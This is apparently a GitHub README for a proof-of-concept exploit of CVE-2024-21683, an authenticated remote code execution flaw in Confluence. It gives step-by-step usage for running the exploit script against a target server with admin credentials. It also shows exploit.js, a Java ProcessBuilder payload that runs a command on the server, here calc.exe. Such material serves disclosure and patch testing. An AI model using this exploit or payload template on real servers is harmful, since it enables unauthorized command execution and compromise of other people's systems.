W01fh4cker/CVE-2024-21683-RCE

CVE-2024-21683 Confluence Post Auth RCE

CVE-2024-21683-RCE

Credit

https://x.com/realalphaman_

https://realalphaman.substack.com/p/quick-note-about-cve-2024-21683-authenticated

Usage

git clone https://github.com/W01fh4cker/CVE-2024-21683-RCE
cd CVE-2024-21683-RCE
pip install requests bs4
python CVE-2024-21683.py -u http://192.168.198.1:8090 -au admin -ap admin -f exploit.js -n test -p http://127.0.0.1:8083

exploit.js:

new java.lang.ProcessBuilder["(java.lang.String[])"](["calc.exe"]).start()